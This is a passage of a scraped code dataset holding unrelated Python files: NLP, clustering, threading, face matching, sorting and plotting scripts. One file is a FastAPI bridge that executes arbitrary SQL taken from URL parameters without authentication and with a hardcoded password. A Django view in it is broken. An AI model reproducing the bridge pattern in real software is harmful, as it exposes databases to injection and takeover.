nltk.pos_tag(nltk.word_tokenize(sentence)))\r\n\r\n sp = stanford.StanfordParser()\r\n trees = [tree for tree in sp.parse(sentence.split())]\r\n t = nltk.tree.Tree.fromstring(str(trees[0]))\r\n for rule in t.productions():\r\n st = rule.unicode_repr()\r\n expr = st.split(\"->\")\r\n if expr[0] not in dt.keys():\r\n dt[expr[0]] = [expr[1]]\r\n else:\r\n if expr[1] not in dt[expr[0]]:\r\n dt[expr[0]].append(expr[1])\r\n else:\r\n repeating_patterns.append(expr[0] + \" -> \" + expr[1])\r\n\r\ndef sentence_length(txt):\r\n print(txt + \":\")\r\n file_name = open(txt, encoding='utf-8')\r\n file = file_name.read()\r\n\r\n file = re.sub(prefixes, \"555\\n\", file)\r\n pat = re.compile(r'([A-Z][^\\.!?]*[\\.!?])', re.M)\r\n sentences = pat.findall(file)\r\n sentence_lengths = {}\r\n for sentence in sentences:\r\n if re.search(r'[0-9]\\n', sentence) == None:\r\n sentence = \" \".join(sentence.split())\r\n if sentence.count(' ') >= 2:\r\n tags = nltk.pos_tag(nltk.word_tokenize(sentence))\r\n flag = False\r\n for tag in tags:\r\n if tag[1] in verb_tags:\r\n flag = True\r\n break\r\n if flag:\r\n sentence_lengths[sentence] = len(sentence)\r\n\r\n sentences = list(sentence_lengths.keys())\r\n lengths = list(sentence_lengths.values())\r\n max_length = max(lengths)\r\n min_length = min(lengths)\r\n max_length_sentence = sentences[lengths.index(max_length)]\r\n min_length_sentence = sentences[lengths.index(min_length)]\r\n mean_sentence_length = statistics.mean(lengths)\r\n stdev_sentence_length = statistics.stdev(lengths)\r\n\r\n print(\"Mean Sentence Length: \" + str(mean_sentence_length))\r\n print(\"Stdev Sentence Length: \" + str(stdev_sentence_length))\r\n print(\"Max Length: \" + str(max_length))\r\n print(\"Longest Sentence: \" + max_length_sentence)\r\n\r\n pos_tagging(max_length_sentence)\r\n\r\n print(\"Min Length: \" + str(min_length))\r\n print(\"Shortest Sentence: \" + min_length_sentence)\r\n\r\n pos_tagging(min_length_sentence)\r\n\r\ndef main():\r\n global dt\r\n dt = {}\r\n global repeating_patterns\r\n repeating_patterns = []\r\n file_names = ['17170-0', 'pg17606', 'Vegetius']\r\n for txt in file_names:\r\n sentence_length(txt + '.txt')\r\n print()\r\n\r\n print(\"Patterns that repeat in all three trees:\")\r\n for pattern in repeating_patterns:\r\n print(pattern, end=', ')\r\n\r\n print()\r\n print(\"\\nCFG for the parse trees of the three longest sentences:\")\r\n for 
key in dt:\r\n v = \" |\".join(dt[key])\r\n print(key, ' -> ', v)\r\n\r\nmain()","repo_name":"hiteshishah/DACC","sub_path":"DACC_Homework_2.py","file_name":"DACC_Homework_2.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18093159984","text":"from django.shortcuts import render\nfrom .forms import ResidenciaForm\n\n# Create your views here.\ndef add_res(response):\n if response.method == \"POST\":\n form = ResidenciaForm(response.POST)\n if form.is_valid():\n form.save()\n return redirect(\"/residencia_añadida\")\n else:\n form = ResidenciaForm()\n return render (request, \"alojamientos/añadir.html\", {\"form\":form})\n #if response.user.is_authenticated:\n\n #else:\n # return redirect(\"usuario/register.html\")\n","repo_name":"StephanieBarbitta/Alojamientos---bit","sub_path":"alojamientos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39684635970","text":"#使用互斥锁---解决变量共享问题\n\nfrom threading import Thread,Lock #Lock锁模块\n\n\ng_num = 0\n\ndef test1():\n global g_num\n locktest.acquire() # 上锁 #当test1上锁后,test2后sleep\n for i in range(10000000):\n g_num+=1\n print(\"test1= %d\" %g_num)\n locktest.release() #解锁 #当test1解锁后,会 通知 其它线程\ndef test2():\n global g_num\n locktest.acquire() # 上锁\n for i in range(10000000):\n g_num+=1\n print(\"test2= %d\" % g_num)\n locktest.release() #解锁\nlocktest = Lock() #创建一把互斥锁\n\n\np1 = Thread(target=test1)\n\n\np2 = Thread(target=test2)\n\np1.start()\n##time.sleep(1)\np2.start()\n\n#test1和test2 无论那方先执行,只要上锁后,另一方只能卡着,等待开锁后,才能执行另一个\n","repo_name":"weilink025/python3x-learnning","sub_path":"python大佬炮制/系统编程/线程/4-互斥锁---解决线程共享全局变量的问题.py","file_name":"4-互斥锁---解决线程共享全局变量的问题.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"329403442","text":"import psycopg2\nimport config as c\nimport numpy as np\nimport time\nimport json\nfrom scipy.special import expit\n\n\nclass Face:\n def __init__(self):\n self.conn = psycopg2.connect(\"dbname=\" + c.config[\"Db\"][\"dbname\"] + \" host=\" + c.config[\"Db\"][\"Host\"] + \" port=\" + c.config[\"Db\"][\"Port\"])\n self.cur = self.conn.cursor()\n\n def get_feature_repo(self):\n self.cur.execute(\"SELECT id,name,feature,face_img FROM \" + c.config[\"Db\"][\"table\"] + \" WHERE status=0\")\n self.repo = self.cur.fetchall()\n\n def match(self, na, score=0.85):\n # Cache all database face features\n self.get_feature_repo()\n uid = 0\n tmp = 0\n most_face = ''\n face_img = ''\n for i in self.repo:\n distance = np.linalg.norm(na - i[2])\n conf = expit((6000 - distance) / 1000)\n if conf > tmp and conf >= score:\n uid = i[0]\n tmp = conf\n most_face = i[1]\n face_img = i[3]\n\n ret = {\n \"id\": uid,\n \"name\": most_face,\n \"face_img\": face_img,\n \"attended_at\": time.time(),\n \"score\": tmp,\n \"status\": 1\n }\n\n print(json.dumps(ret, ensure_ascii=False))\n\n def __del__(self):\n self.cur.close()\n self.conn.close()","repo_name":"jennyb2911/chameleon-2","sub_path":"sql/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"16002411456","text":"import utils\nimport numpy as np\nimport json\nimport time\n\ndef kmeans(img,k):\n \"\"\"\n Implement kmeans clustering on the 
given image.\n Steps:\n (1) Random initialize the centers.\n (2) Calculate distances and update centers, stop when centers do not change.\n (3) Iterate all initializations and return the best result.\n Arg: Input image;\n Number of K. \n Return: Clustering center values;\n Clustering labels of all pixels;\n Minimum summation of distance between each pixel and its center. \n \"\"\"\n\n lab=np.zeros((len(img),len(img[0])))\n r,c=img.shape\n p_val=list(set(img.flatten()))\n pts=list(cmbs(2,p_val))\n his,bedg=np.histogram(img,256,[0, 256])\n c2_fin=[] \n c1_fin=[]\n centers=[] \n s_d=float('inf')\n for pt in pts:\n d1=float('-inf')\n d2=float('-inf')\n avg_c1=0 \n avg_c2=0 \n centers1=[]\n s_d1=0\n i=0\n while(d2!= 0 and d1!= 0):\n if(i!=0):\n C1=avg_c1\n C2=avg_c2\n else:\n C1=pt[0] \n C2=pt[1]\n sum2=0\n sum1=0\n C2_lst=[] \n C1_lst=[] \n for indi,val in enumerate(his):\n if(abs(indi-C2)>abs(indi-C1)):\n C1_lst.append(val)\n sum1+=(indi*val)\n else:\n C2_lst.append(val)\n sum2+=(indi*val)\n if(sum(C1_lst)!=0):\n avg_c1=(int(sum1)/sum(C1_lst))\n if(sum(C2_lst)!=0):\n avg_c2=(int(sum2)/sum(C2_lst)) \n d1=C1-avg_c1\n d2=C2-avg_c2\n i+=1\n centers1.append(avg_c1)\n centers1.append(avg_c2)\n for indi,val in enumerate(his):\n if(abs(indi-centers1[1])>abs(indi-centers1[0])):\n s_d1+=(val*abs(indi-centers1[0]))\n else:\n s_d1+=(val*abs(indi-centers1[1]))\n if(s_d>s_d1):\n s_d=s_d1\n centers=centers1\n for indi,val in enumerate(his):\n if(abs(indi-centers[1])>abs(indi-centers[0])):\n c1_fin.append(indi)\n else:\n c2_fin.append(indi)\n for m in range(r):\n for n in range(c):\n if (img[m][n] in c1_fin):\n lab[m][n]=0\n else:\n lab[m][n]=1\n return centers,lab,s_d\n\ndef visualize(centers,labels):\n \"\"\"\n Convert the image to segmentation map replacing each pixel value with its center.\n Arg: Clustering center values;\n Clustering labels of all pixels. 
\n Return: Segmentation map.\n \"\"\"\n # TODO: implement this function.\n r,c=labels.shape\n res=np.zeros((r,c))\n for m in range(r):\n for n in range(c):\n if(labels[m][n]==0):\n res[m][n]=centers[0]\n else:\n res[m][n]=centers[1]\n res=res.astype(np.uint8)\n return res\n\n#To be able to generate combinations\ndef cmbs(b,ite):\n pl=tuple(ite)\n n=len(pl)\n if(n0)+b1\n ex = ez = 0.0\n ey = 0.0\n elif type==3:\n print('Comment out this line when you use your customized profile')\n # your customization here\n\n mf = np.array([bx, by, bz])\n ef = np.array([ex, ey, ez])\n return(mf, ef)\n","repo_name":"tsubok1969/toyplasma","sub_path":"sim/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15898219514","text":"#!/user/bin/python3\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\nfrom decimal import Decimal\n# Multipage pdf support\nfrom matplotlib.backends.backend_pdf import PdfPages\n# Progress bar\nfrom tqdm import tqdm\n\nfrom core.data import Data\nfrom core.helpers import create_incremented_filename\n\ndef main():\n d = Data()\n d.collect_from_csv('output/geordende_oogsten_jaar.csv')\n\n filename = create_incremented_filename('output/graphs_multiple.pdf')\n with PdfPages(filename) as pdf:\n for line in tqdm(d.data):\n name = ' '.join(line[:2])\n # Load date year pairs [decimal_date, year]\n date_year_pairs = [l.strip().split('#') for l in line[2:] if (l.strip() not in ('', '\\n', '0', 0))]\n\n # Ignore empty rows\n if not date_year_pairs:\n continue\n\n # Separate pairs into two lists\n x = [float(v[1]) for v in date_year_pairs] # Years\n y = [float(v[0]) for v in date_year_pairs] # Decimal dates\n\n\n plt.figure()\n # Scatter plot\n plt.scatter(x, y, c='#0000ff')\n # Regression line\n fit = np.polyfit(x, y, deg=1)\n fit_fn = np.poly1d(fit)\n plt.plot(x, fit_fn(x), '--k', color='red')\n #plt.axis([0, 13, int(min(dates), int(max(dates)))])\n y_mean = int(np.mean(y).round())\n plt.yticks(range(y_mean-3, y_mean+3))\n #plt.xticks(range(len(dates)))\n plt.xticks(range(2005, 2018))\n plt.ylabel('Months')\n plt.xlabel('Harvests')\n plt.title(name)\n pdf.savefig()\n\n# with PdfPages('output/graphs_combined.pdf') as pdf:\n# plt.figure()\n#\n# i = range(1, len(d.data)+1)\n# for line in tqdm(d.data):\n# name = ' '.join(line[:2])\n# # Load date year pairs [decimal_date, year]\n# date_year_pairs = [l.strip().split('#') for l in line[2:] if (l not in ('', '\\n', '0'))]\n# # Separate pairs into two lists\n#\n# x = [float(v[1]) for v in date_year_pairs] # Years\n# y = [float(v[0]) for v in date_year_pairs] # Decimal dates\n#\n#\n# # Scatter plot\n# plt.scatter(x, y, c=i, cmap=plt.cm.hsv)\n#\n# plt.yticks(range(13))\n# plt.xticks(range(2005, 2018))\n# plt.ylabel('Maanden')\n# plt.xlabel('Jaren')\n# plt.title('Weleda NL Oogsten')\n# pdf.savefig()\n\nif __name__ == '__main__':\n main()\n","repo_name":"dominic-dev/wdao","sub_path":"wdao/generate_graphs.py","file_name":"generate_graphs.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74657382983","text":"from fastapi import FastAPI\nimport pymysql\n\n# initialize\napp = FastAPI()\nconnect = pymysql.connect(\n host='192.168.56.101',\n port=4567,\n user='dohyunkim',\n password='0000',\n db='TermProject',\n charset='utf8'\n)\ncursor = connect.cursor()\n\n@app.get(\"/select\")\nasync def select(command: 
str):\n cursor.execute(command)\n returnValue = \"\"\n results = cursor.fetchall()\n for result in results:\n returnValue += str(result) + \"\\n\"\n return returnValue\n\n@app.get(\"/insert\")\nasync def insert(command: str):\n cursor.execute(command)\n return \"입력하신 데이터가 입력되었습니다.\"\n\n@app.get(\"/delete\")\nasync def delete(command: str):\n cursor.execute(command)\n return \"입력하신 데이터가 삭제되었습니다.\"\n\n@app.get(\"/alter\")\nasync def alter(command: str):\n cursor.execute(command)\n return \"입력하신 데이터가 적용되었습니다.\"\n\n@app.get(\"/update\")\nasync def update(command: str):\n cursor.execute(command)\n return \"입력하신 데이터값으로 값이 업데이트 되었습니다.\"\n\n@app.get(\"/end\")\nasync def end(command: str):\n disappear()\n return \"종료되었습니다.\"\n\ndef disappear():\n connect.commit()\n cursor.close()\n connect.close()\n","repo_name":"a-mystic/DB-School-lecture","sub_path":"Term Project/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18489335117","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport shutil\nimport os\nimport pandas as pd\n\n# Hold global variables for error function\nreset = 0\nerror_func_holder = []\nerror_index = []\ndef error_func(error):\n \"\"\"\n Sums up alle the distances for each centroids and stores it in global variable to plot\n at the end of algorithm.\n \"\"\"\n global error_func_holder\n summed = 0\n for key in error:\n summed += np.sum(error[key])\n error_func_holder.append(summed)\n\n\n\n\n\n\n\ndef get_distance(data, centroids, N):\n \"\"\"\n Find distance between the datapoints to the centroids.\n \"\"\"\n\n # find shape\n rows_data, cols_data = data.shape\n temp = np.zeros((rows_data,N))\n # fill temporary matrix with the distances in the N dimensional space of the dataset\n for length, row in enumerate(data):\n for cent, row_cent in enumerate(centroids):\n # [centroid1, centroid2]\n #[length , length]\n temp[length, cent] = np.linalg.norm(row-row_cent)\n\n return temp\n\n\n\ndef get_cents(data, temp, label = [None]):\n \"\"\"\n Assigns the datapoints which are nearest a centroid and put them in a dictionary\n which belongs a the centroid.\n \"\"\"\n groups = {}\n error_dist = {}\n label_dic = {}\n for i, row in enumerate(temp):\n #assign centroid to datapoints with lowest distance to a dictionary\n # argmin will give index of the lowest value (index = centroid)\n centroid_index = np.argmin(row)\n\n\n #if not exist in centroid dictionary assign new list\n if centroid_index not in groups:\n groups[centroid_index] = []\n\n if centroid_index not in error_dist:\n error_dist[centroid_index] = []\n\n #fills up the centroid with the datapoints\n groups[centroid_index].append(data[i,:])\n\n # If enabled (label != None) then add all the labels to the centroids aswell.\n if label[0] != None:\n if centroid_index not in label_dic:\n label_dic[centroid_index] = []\n label_dic[centroid_index].append(label[i])\n\n\n #fills up the error dictionary for the cost function\n error_dist[centroid_index].append(row[centroid_index])\n\n for key in groups:\n #Make them numpy arrays to be able to use numpy on the datapoints\n groups[key] = np.array(groups[key])\n error_func(error_dist)\n\n return groups, label_dic\n\n\n\ndef get_means(data, groups):\n \"\"\"\n Get the mean of the clusters and assign the centroids this new coordinate in a\n dictionary.\n \"\"\"\n features = len(data[0])\n groups_mean = {}\n for i in groups:\n for n in 
range(features):\n if i not in groups_mean:\n groups_mean[i] = []\n groups_mean[i].append(np.mean(groups[i][:,n]))\n\n return groups_mean\n\n\ndef initate_cents(data, N):\n \"\"\"\n Make random centroids in the vectorspace of the datapoints\n \"\"\"\n global reset\n features = len(data[0])\n # map the min and max value of the dataset to contain the centoid spawn into\n centroids = np.zeros((N,features))\n\n # place centroids in N dimensional space\n for j in range(N):\n for i in range(features):\n # make random coordinate\n rand = np.random.choice(data[random.randint(0,len(data)-1)], replace=False)\n centroids[j,i] = rand\n reset = 0\n return centroids\n\n\ndef remake_cents(data, groups_mean, N):\n \"\"\"\n Since the distance function uses matrix, we need to fill up a new\n matrix with the new mean coordinates.\n \"\"\"\n\n global error_func_holder\n global error_index\n features = len(data[0])\n centroids = np.zeros((N,features))\n\n try:\n # assign centroids to new matrix for finding distance if not all centroids (N) have atleast one\n # data point assigned to it, this test will fail and go to except to make new random centroids.\n for j in range(N):\n centroids[j,:] = groups_mean[j]\n\n # If some centroids fails tp find a cluster we make new random centroids\n # this could happen there is one centroid which didnt have a closest datapoint\n except:\n if not os.path.exists('plots'):\n os.makedirs('plots')\n # remove plots added to folder\n shutil.rmtree('plots')\n if not os.path.exists('plots'):\n os.makedirs('plots')\n\n error_index.append(len(error_func_holder)-1)\n # initiate new random centroids\n return initate_cents(data, N)\n\n return centroids\n\n\n\ndef make_plots(savefi, groups, groups_mean, N, savefigure = False):\n \"\"\"\n If savefigure = True then plot the dataset and centroids with their respective color\n and save the figures.\n \"\"\"\n plt.figure(figsize = (15,10))\n colors = ['red','blue','green','orange','pink','purple','yellow','black','brown','lightgreen','k', 'w','c','lightblue']\n for i in groups:\n plt.plot(groups[i][:,0],groups[i][:,1], 'o', color = colors[i], markeredgecolor= 'black')\n\n\n for i in groups_mean:\n plt.plot(groups_mean[i][0],groups_mean[i][1],'^', color = colors[i], markersize = 20, markeredgecolor= 'black')\n\n #make new folder if it does not exist (for plots)\n if not os.path.exists('plots'):\n os.makedirs('plots')\n # # Save plots\n # make_plots(savefi, groups, groups_mean, N)\n plt.title('K-means plot', fontsize = 20)\n if savefigure == True:\n plt.savefig('plots/k-means_%d_cents%d'%(savefi,N))\n plt.close()\n\n\n\ndef k_means(data, N, label = [None], savefigure = False, max_iters = 150):\n \"\"\"\n This is the main k-means algo, this is the function to run,\n this function \"initate_cents\", \"get_distance\", \"get_cents\", \"remake_cents\" functions.\n \n returns grousp dictionary, centroid placement dictionary, and labels (labels are empty dictionary if \n labels are not given)\n \"\"\"\n\n #make new folder if it does not exist (for plots)\n if not os.path.exists('plots'):\n os.makedirs('plots')\n\n\n # make a loader for to see that the program is working\n loader = ['|','/','-','|','/','-']\n\n # copy to avoid pointer\n data = np.copy(data)\n\n rows_data, cols_data = data.shape\n\n # Make random placed centroids\n centroids = initate_cents(data, N)\n\n #some variables to change in the whole loop to keep track of loader etc.\n change = 0\n savefi = 0\n load = 0\n global reset\n\n # Begin iteration\n while True:\n\n # Find distance from all 
points\n temp = get_distance(data, centroids, N)\n\n # Group the data to the centroids\n groups, label_dic = get_cents(data, temp, label)\n\n if reset >= 2:\n make_plots(savefi, groups, groups_mean, N, savefigure)\n\n # Get mean coordinates for the centroids\n groups_mean = get_means(data, groups)\n\n # make matrix with coordinates for distance measure\n centroids = remake_cents(data, groups_mean, N)\n\n\n\n # if converged or reached max iterations return the groups of clusters\n if change == np.sum(temp) or savefi == max_iters:\n global error_index\n global error_func_holder\n # get the values from error function where new centroids where generated\n error_values = [error_func_holder[x] for x in error_index]\n\n #Plots the error function and the generated centroids\n plt.plot(error_func_holder,'--', label = 'Cost function')\n #plt.plot(error_index, error_values,'*', label = 'Generated new centroids', color = 'red', markersize = 13)\n plt.title('Cost function of k-means', fontsize = 20)\n plt.ylabel('Error', fontsize = 15)\n plt.xlabel('Iteration', fontsize = 15)\n plt.legend(loc = 'best')\n # save errorfunction plot\n plt.savefig('plots/errorfunction.png')\n plt.close()\n # return the centroids with their given dataset and the placement of the centroids\n return groups, groups_mean, label_dic\n\n\n # To change name of savefig file\n savefi += 1\n reset += 1\n change = np.sum(temp)\n\n # The loader\n load += 1\n try:\n print('{0} {0} {0} Generating k-means {0} {0} {0}'.format(loader[load]), end = '\\r')\n except:\n load = 0\n print('{0} {0} {0} Generating k-means {0} {0} {0}'.format(loader[load]), end = '\\r')\n\n\n\n\n\n\ndef plot_centroids(groups, title , v, h):\n \"\"\"\n Plots the images given.\n \"\"\"\n for i in sorted(groups):\n\n plt.subplot(5,2,i+1)\n number = groups[i]\n number = np.reshape(number,(v,h))\n plt.imshow(number, cmap = 'Greys_r')\n plt.suptitle(title, fontsize = 20)\n plt.savefig('plots/%s.png'%title)\n plt.close()\n\n\n\n\n\ndef feature_reduction(X):\n \"\"\"\n Reduced the features of data to two dimensions\n \"\"\"\n # Get eigenvalues and eigenvector\n val, E = np.linalg.eig(X)\n # Sorting highest to lowest eigenvalues\n idx = val.argsort()[::-1]\n val = val[idx]\n # Taking square root of the diagonal eigenvalue matrix\n Dsqr = np.sqrt(np.diag(val))\n print(Dsqr)\n # Taking the inner product to form data-set Z\n Z = np.dot(E, Dsqr)\n # Return two features\n return Z[:,:2]\n\n\n\n\n\ndef minmax_control(groups, centroid_placement):\n \"\"\"\n Finds the datapoints closest to the centroids and the ones on the border\n returns two dictionaries, first is datapoint closest to centroids and second dictionary\n is the ones on the border. 
The plots are saved to folder /plots\n \"\"\"\n\n colors = ['red','blue','green','orange','pink','purple','yellow','black','brown','lightgreen','k', 'w','c','lightblue']\n \n distances_to_centroids = {}\n for i in groups:\n for datapoint in groups[i]:\n if i not in distances_to_centroids:\n distances_to_centroids[i] = []\n distances_to_centroids[i].append(np.linalg.norm(datapoint - centroid_placement[i]))\n\n borders = {}\n closest = {}\n for i in distances_to_centroids:\n if i not in borders:\n borders[i] = []\n max_index = np.argmax(distances_to_centroids[i])\n borders[i].append(groups[i][max_index])\n\n if i not in closest:\n closest[i] = []\n min_index = np.argmin(distances_to_centroids[i])\n closest[i].append(groups[i][min_index])\n \n\n \n for i in distances_to_centroids:\n plt.plot(distances_to_centroids[i], '*', markeredgecolor= 'black', markersize = 10 , color = colors[i], label = 'Centroid %d'%i)\n plt.xlabel('Index of datapoint')\n plt.ylabel('Distance from their respective centroid')\n plt.legend(loc = 'best')\n plt.savefig('plots/Distance_Plot')\n plt.close()\n\n return closest, borders\n\n\n\n\ndef border_control(centroid_placement):\n\n \"\"\"\n Finds the border cases from each centroid\n \"\"\"\n\n # finds all the unit vectors \n borders = {}\n for i in centroid_placement:\n if i not in borders:\n borders[i] = []\n for l in centroid_placement:\n if i == l:\n continue\n else:\n borders[i].append((np.array(centroid_placement[l]) - np.array(centroid_placement[i]))\\\n /(np.linalg.norm(np.array(centroid_placement[l]) - np.array(centroid_placement[i]))))\n # dictionary for which cluster it has the boundary to\n bound_change_cluster = {}\n # dictionary for the position for which the boundary is\n bound_change_position = {}\n for indec in sorted(centroid_placement):\n # lock to start with cluster when we have found the boundary\n lock = 0\n while True:\n if lock != 1:\n # Find the current position on the vector\n try:\n current_position = centroid_placement[indec] + i*np.array(borders[indec][indec])\n except:\n current_position = centroid_placement[indec] + i*np.array(borders[indec][0])\n # list to append all the distances to each centroid from the point on the vector\n lst = []\n for j in sorted(centroid_placement):\n lst.append(np.linalg.norm(current_position - centroid_placement[j]))\n # find which centroid the point belongs too by finding the minimum distance\n # and chech which index(cluster) it belongs to\n index_min = np.argmin(lst)\n i += 0.1\n if indec != index_min:\n if indec not in bound_change_position:\n bound_change_position[indec] = []\n bound_change_cluster[indec] = []\n bound_change_cluster[indec].append(index_min)\n bound_change_position[indec].append(current_position)\n lock = 1\n else:\n break\n \n return bound_change_cluster, bound_change_position\n\n\n\ndef border_control_all_boundaries(centroid_placement):\n\n \"\"\"\n Finds the border cases from each centroid\n \"\"\"\n\n # finds all the unit vectors \n borders = {}\n for i in sorted(centroid_placement):\n if i not in borders:\n borders[i] = []\n for l in sorted(centroid_placement):\n if i == l:\n continue\n else:\n borders[i].append((np.array(centroid_placement[l]) - np.array(centroid_placement[i]))\\\n /(np.linalg.norm(np.array(centroid_placement[l]) - np.array(centroid_placement[i]))))\n # dictionary for which cluster it has the boundary to\n bound_change_cluster = {}\n # dictionary for the position for which the boundary is\n bound_change_position = {}\n for indec in sorted(centroid_placement):\n for 
border_values in borders[indec]:\n # lock to start with cluster when we have found the boundary\n lock = 0\n while True:\n if lock != 1:\n # Find the current position on the vector\n current_position = np.array(centroid_placement[indec]) + i*np.array(border_values)\n # list to append all the distances to each centroid from the point on the vector\n lst = []\n for j in sorted(centroid_placement):\n lst.append(np.linalg.norm(current_position - centroid_placement[j]))\n # find which centroid the point belongs too by finding the minimum distance\n # and chech which index(cluster) it belongs to\n index_min = np.argmin(lst)\n i += 0.1\n if indec != index_min:\n if indec not in bound_change_position:\n bound_change_position[indec] = []\n bound_change_cluster[indec] = []\n # cluster represents which the centroid borders to\n bound_change_cluster[indec].append(index_min)\n # position is the border positions\n bound_change_position[indec].append(current_position)\n lock = 1\n else:\n break\n \n return bound_change_cluster, bound_change_position\n","repo_name":"MartinRovang/UniversityPhysics","sub_path":"Machine Learning/Hjemmeeksamener/part3/machinepy.py","file_name":"machinepy.py","file_ext":"py","file_size_in_byte":15345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"15666761237","text":"import sys, os\nimport datetime\nimport pyttsx\nimport time\n\n# Currently age and female properties are not available\n# They are just added as skeleton\n# When a workaround or provision for such properties will be available,\n# then at that time this function will modified to get voice property of that\n# Currently only by accent voice proprety is returned\ndef get_voice_property(engine, age=30, gender='female', accent='english-us'):\n\tvoices = engine.getProperty('voices')\n\tfor voice in voices:\n\t\tif accent in str(voice.name):\n\t\t\treturn voice\n\n\traise ValueError('Demanded accent does not matched')\n\ndef onStartUtterance(name):\n\tprint(name)\n\ndef speak_sentences(sentences, max_sentences_to_be_spoken=sys.maxsize):\n\tmax_sentences_to_be_spoken = min(max_sentences_to_be_spoken, len(sentences))\n\n\ti = 1\n\tfor s in sentences:\n\t if i > max_sentences_to_be_spoken:\n\t \tbreak\n\t print(s)\n\t speak_single_sentence(s)\n\t i += 1\n\t \n\ndef speak_single_sentence(sentence):\n\tengine = pyttsx.init()\n\tengine.setProperty('rate', 140)\n\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='hindi')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='english')\n\tvoice = get_voice_property(engine, age=10, gender='female', accent='default')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='english-north')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='english_rp')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='english_wmids')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='default')\n\n\n\tengine.setProperty('voice', voice.id)\n\tengine.say(sentence)\n\tengine.runAndWait()\n \n\n\nif __name__ == '__main__':\n\tpass\n\t\t\t\n\t\t\t","repo_name":"ParasAvkirkar/MagooshHelper","sub_path":"speech_utilities.py","file_name":"speech_utilities.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"81"} +{"seq_id":"27376562493","text":"# -*- coding: utf-8 -*-\n\nfrom utils import DataTransformat, ListNode\n\nclass 
Solution(object):\n def addTwoNumbers(self, l1, l2):\n n = l1.val + l2.val\n l3 = ListNode(n % 10)\n l3.next = ListNode(n // 10)\n p1 = l1.next\n p2 = l2.next\n p3 = l3\n while True:\n if p1 and p2:\n sum = p1.val + p2.val + p3.next.val\n p3.next.val = sum % 10\n p3.next.next = ListNode(sum // 10)\n p1 = p1.next\n p2 = p2.next\n p3 = p3.next\n elif p1 and not p2:\n sum = p1.val + p3.next.val\n p3.next.val = sum % 10\n p3.next.next = ListNode(sum // 10)\n p1 = p1.next\n p3 = p3.next\n elif not p1 and p2:\n sum = p2.val + p3.next.val\n p3.next.val = sum % 10\n p3.next.next = ListNode(sum // 10)\n p2 = p2.next\n p3 = p3.next\n else:\n if p3.next.val == 0:\n p3.next = None\n break\n return l3\n\ndef add_2_numbers():\n list_1 = [2, 4, 3]\n link_1 = DataTransformat.list_2_link(list_1)\n\n list_2 = [5, 6, 4]\n link_2 = DataTransformat.list_2_link(list_2)\n \n res_link = Solution().addTwoNumbers(link_1, link_2)\n res_list = DataTransformat.link_2_list(res_link)\n print(res_list)\n\nadd_2_numbers()\n","repo_name":"halysl/code","sub_path":"leetcode/2-两数相加.py","file_name":"2-两数相加.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34480155786","text":"import random\n# max('yellow','red','orange','blue','green')\n\n# max([12,34,23,3])\n# a=max\n# print(max)\n\n# for roll in range(10):\n# print(random.randrange(1,7),end=\"\")\n\ndef my_func():\n\tx = 10\n\tprint(\"Value inside function:\",x)\n\nx = 20\nmy_func()\nprint(\"Value outside function:\",x)","repo_name":"everybees/python_with_cohorts","sub_path":"nine/oluwaseun_joshua/chapter_four/pratice_excercise.py","file_name":"pratice_excercise.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35368662785","text":"# Sorting Algorithms\n\nclass SortingAlgorithms:\n\n # Bubble Sort\n def bubbleSort(self, arr: [int]):\n for i in range(len(arr) - 1, 0, -1):\n for j in range(i):\n if arr[j] > arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n # print(i, \" - \", j)\n return arr\n\n # Selection Sort\n def selectionSort(self, arr: [int]):\n for i in range(0, len(arr) - 1):\n minIndex = i\n for j in range(i + 1,\n len(arr)): # En sola yerlşetirilmiş elemanları tekrar tekrar gezmemek için i+1 olarak yaptık\n if arr[j] < arr[minIndex]:\n minIndex = j\n if i != minIndex:\n arr[i], arr[minIndex] = arr[minIndex], arr[i]\n return arr\n\n # Insertion Sort\n def insertionSort(self, arr: [int]):\n for i in range(1, len(arr)):\n temp = arr[i] # kıyaslama yapılacak olan degeri tutugumuz degisken.\n j = i - 1 # i - 1 sayesinde hep kıyaslama yapılan degerin solundakileri kontrol ediyoruz.\n while temp < arr[\n j] and j > -1: # j > -1 iki nedenle yapıldı, birincisi j, -1 olup dizinin son indeksini göstermesin diye.\n arr[j + 1] = arr[j]\n arr[j] = temp\n j -= 1\n return arr\n\n # Merge Sort\n def merge(self, arr1: [int], arr2: [int]):\n firstPointer = 0\n secondPointer = 0\n mergedList = []\n\n while firstPointer < len(arr1) and secondPointer < len(arr2): # Bölünmüs array lerin boyutlarını gecmemesi icin kontrol ederiz.\n if arr1[firstPointer] < 